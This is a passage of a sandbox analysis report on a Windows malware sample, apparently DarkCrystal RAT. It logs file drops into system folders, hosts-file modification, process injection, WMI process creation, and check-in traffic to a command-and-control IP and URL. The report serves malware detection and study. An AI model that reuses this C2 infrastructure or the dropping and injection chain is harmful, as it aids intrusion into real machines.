valid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF7F4D7ECA0
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D6647C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF7F4D6647C
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D930F0 FindFirstFileExA,	0_2_00007FF7F4D930F0
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D5A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	1_2_00D5A69B
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D6C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	1_2_00D6C220
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_000001B0BB98DCE0 FindFirstFileExW,	7_2_000001B0BB98DCE0
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 9_2_00000216D26FDCE0 FindFirstFileExW,	9_2_00000216D26FDCE0
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E93EDCE0 FindFirstFileExW,	38_2_00000150E93EDCE0
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_00000267FCE9DCE0 FindFirstFileExW,	40_2_00000267FCE9DCE0
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B52DCE0 FindFirstFileExW,	45_2_000002359B52DCE0
Source: C:\Windows\System32\winlogon.exe	Code function: 49_2_00000225DC64DCE0 FindFirstFileExW,	49_2_00000225DC64DCE0

Source: C:\PerfDll\hyperProviderSavesinto.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh		8_2_00007FFD9BC4D87D
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh		20_2_00007FFD9BC7D87D

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49730 -> 176.123.168.151:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: SPEEDYLINERU SPEEDYLINERU

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: c12f54a3f91dc7bafd92cb59fe009a35

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown	TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown	TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown	TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown	TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown	TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown	TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown	TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown	TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown	TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown	TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown	TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown	TCP traffic detected without corresponding DNS query: 176.123.168.151
Source: unknown	TCP traffic detected without corresponding DNS query: 176.123.168.151

Source: unknown

Source: KZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000035B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://176.123.168.151
Source: KZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000035B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows
Source: hyperProviderSavesinto.exe, 00000008.00000002.1733479923.0000000003304000.00000004.00000800.00020000.00000000.sdmp, KZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000035B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: KZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000036B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://176.123.168.151
Source: KZcLqgnLvRf.exe, 00000014.00000002.2886107190.00000000036B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Window

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown

HTTPS traffic detected: 176.123.168.151:443 -> 192.168.2.4:49738 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Modifies the hosts file

Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Contains functionality to call native functions

Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E93E253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,	38_2_00000150E93E253C
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E93E202C NtQuerySystemInformation,StrCmpNIW,	38_2_00000150E93E202C
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E93E2244 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,	38_2_00000150E93E2244
Source: C:\Windows\System32\dialer.exe	Code function: 46_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,	46_2_00000001400010C0
Source: C:\Windows\System32\winlogon.exe	Code function: 49_2_00000225DC6428C8 NtEnumerateValueKey,NtEnumerateValueKey,	49_2_00000225DC6428C8

Contains functionality to communicate with device drivers

Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe

Code function: 1_2_00D56FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

1_2_00D56FAA

Creates files inside the system directory

Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Windows\Provisioning\Packages\e3a74901549792	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Windows\RemotePackages\RemoteDesktops\e3a74901549792	Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D75664	0_2_00007FF7F4D75664
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D83FCC	0_2_00007FF7F4D83FCC
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D6A8AC	0_2_00007FF7F4D6A8AC
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D80998	0_2_00007FF7F4D80998
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D7625C	0_2_00007FF7F4D7625C
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D6DC08	0_2_00007FF7F4D6DC08
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D7ECA0	0_2_00007FF7F4D7ECA0
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D8BDB8	0_2_00007FF7F4D8BDB8
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D6BF08	0_2_00007FF7F4D6BF08
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D92EE4	0_2_00007FF7F4D92EE4
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D98FC8	0_2_00007FF7F4D98FC8
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D6E8D8	0_2_00007FF7F4D6E8D8
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D8C034	0_2_00007FF7F4D8C034
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D7C9F0	0_2_00007FF7F4D7C9F0
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D959A0	0_2_00007FF7F4D959A0
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D6B944	0_2_00007FF7F4D6B944
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D83FCC	0_2_00007FF7F4D83FCC
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D6B314	0_2_00007FF7F4D6B314
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D672AC	0_2_00007FF7F4D672AC
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D8FCD8	0_2_00007FF7F4D8FCD8
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D954D0	0_2_00007FF7F4D954D0
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D5848E	1_2_00D5848E
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D540FE	1_2_00D540FE
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D64088	1_2_00D64088
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D600B7	1_2_00D600B7
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D751C9	1_2_00D751C9
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D67153	1_2_00D67153
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D662CA	1_2_00D662CA
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D532F7	1_2_00D532F7
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D643BF	1_2_00D643BF
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D7D440	1_2_00D7D440
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D5F461	1_2_00D5F461
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D5C426	1_2_00D5C426
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D677EF	1_2_00D677EF
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D7D8EE	1_2_00D7D8EE
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D5286B	1_2_00D5286B
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D819F4	1_2_00D819F4
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D5E9B7	1_2_00D5E9B7
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D66CDC	1_2_00D66CDC
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D63E0B	1_2_00D63E0B
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D5EFE2	1_2_00D5EFE2
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D74F9A	1_2_00D74F9A
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_000001B0BB951F2C	7_2_000001B0BB951F2C
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_000001B0BB95D0E0	7_2_000001B0BB95D0E0
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_000001B0BB9638A8	7_2_000001B0BB9638A8
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_000001B0BB982B2C	7_2_000001B0BB982B2C
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_000001B0BB98DCE0	7_2_000001B0BB98DCE0
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_000001B0BB9944A8	7_2_000001B0BB9944A8
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BA90D7C	8_2_00007FFD9BA90D7C
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BC56BFB	8_2_00007FFD9BC56BFB
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BC55377	8_2_00007FFD9BC55377
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BC462F3	8_2_00007FFD9BC462F3
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BC554FA	8_2_00007FFD9BC554FA
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BC43CE9	8_2_00007FFD9BC43CE9
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BC40CAF	8_2_00007FFD9BC40CAF
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 9_2_00000216D26C1F2C	9_2_00000216D26C1F2C
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 9_2_00000216D26D38A8	9_2_00000216D26D38A8
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 9_2_00000216D26CD0E0	9_2_00000216D26CD0E0
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 9_2_00000216D26F2B2C	9_2_00000216D26F2B2C
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 9_2_00000216D27044A8	9_2_00000216D27044A8
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 9_2_00000216D26FDCE0	9_2_00000216D26FDCE0
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Code function: 20_2_00007FFD9BAC0D7C	20_2_00007FFD9BAC0D7C
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Code function: 20_2_00007FFD9BC85377	20_2_00007FFD9BC85377
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Code function: 20_2_00007FFD9BC854FA	20_2_00007FFD9BC854FA
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Code function: 20_2_00007FFD9BC73CE9	20_2_00007FFD9BC73CE9
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Code function: 20_2_00007FFD9BC70CAF	20_2_00007FFD9BC70CAF
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Code function: 26_2_00007FFD9BAA0D7C	26_2_00007FFD9BAA0D7C
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E90538A8	38_2_00000150E90538A8
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E904D0E0	38_2_00000150E904D0E0
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E9041F2C	38_2_00000150E9041F2C
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E93F44A8	38_2_00000150E93F44A8
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E93EDCE0	38_2_00000150E93EDCE0
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E93E2B2C	38_2_00000150E93E2B2C
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_00000267FCE61F2C	40_2_00000267FCE61F2C
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_00000267FCE6D0E0	40_2_00000267FCE6D0E0
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_00000267FCE738A8	40_2_00000267FCE738A8
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_00000267FCE92B2C	40_2_00000267FCE92B2C
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_00000267FCE9DCE0	40_2_00000267FCE9DCE0
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_00000267FCEA44A8	40_2_00000267FCEA44A8
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B4F1F2C	45_2_000002359B4F1F2C
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B4FD0E0	45_2_000002359B4FD0E0
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B5038A8	45_2_000002359B5038A8
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B53AEC2	45_2_000002359B53AEC2
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B522B2C	45_2_000002359B522B2C
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B52DCE0	45_2_000002359B52DCE0
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B5344A8	45_2_000002359B5344A8
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B53A922	45_2_000002359B53A922
Source: C:\Windows\System32\dialer.exe	Code function: 46_2_000000014000226C	46_2_000000014000226C
Source: C:\Windows\System32\dialer.exe	Code function: 46_2_00000001400014D8	46_2_00000001400014D8
Source: C:\Windows\System32\dialer.exe	Code function: 46_2_0000000140002560	46_2_0000000140002560
Source: C:\Windows\System32\winlogon.exe	Code function: 49_2_00000225DC611F2C	49_2_00000225DC611F2C
Source: C:\Windows\System32\winlogon.exe	Code function: 49_2_00000225DC61D0E0	49_2_00000225DC61D0E0
Source: C:\Windows\System32\winlogon.exe	Code function: 49_2_00000225DC6238A8	49_2_00000225DC6238A8
Source: C:\Windows\System32\winlogon.exe	Code function: 49_2_00000225DC642B2C	49_2_00000225DC642B2C
Source: C:\Windows\System32\winlogon.exe	Code function: 49_2_00000225DC64DCE0	49_2_00000225DC64DCE0
Source: C:\Windows\System32\winlogon.exe	Code function: 49_2_00000225DC6544A8	49_2_00000225DC6544A8

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\IkSFhrpY.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: String function: 00D6EB78 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: String function: 00D6F5F0 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: String function: 00D6EC50 appears 56 times

Sample file is different than original file name gathered from version info

Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe, 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Source: hyperProviderSavesinto.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: KZcLqgnLvRf.exe.8.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: RuntimeBroker.exe.8.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: KZcLqgnLvRf.exe0.8.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: KZcLqgnLvRf.exe1.8.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.adwa.evad.winEXE@77/37@0/1

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Code function: 0_2_00007FF7F4D63BF8 GetLastError,FormatMessageW,LocalFree,

0_2_00007FF7F4D63BF8

Source: C:\Windows\System32\dialer.exe

46_2_000000014000226C

Source: C:\Windows\System32\dialer.exe

Code function: 46_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,

46_2_00000001400019C4

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Code function: 0_2_00007FF7F4D7C220 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00007FF7F4D7C220

Source: C:\PerfDll\hyperProviderSavesinto.exe

File created: C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe

Jump to behavior

Source: C:\PerfDll\hyperProviderSavesinto.exe

File created: C:\Users\user\Desktop\msAjSsFc.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1516:120:WilError_03
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\5ca49a59652f7149b9095204d2006cefde527ed294d5ef6eecd72eab40b4b978
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_7103562

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PerfDll\vvkzdvmSUM14jiAzc.bat" "

Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Command line argument: sfxname	1_2_00D6DF1E
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Command line argument: sfxstime	1_2_00D6DF1E
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Command line argument: STARTDLG	1_2_00D6DF1E

Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe

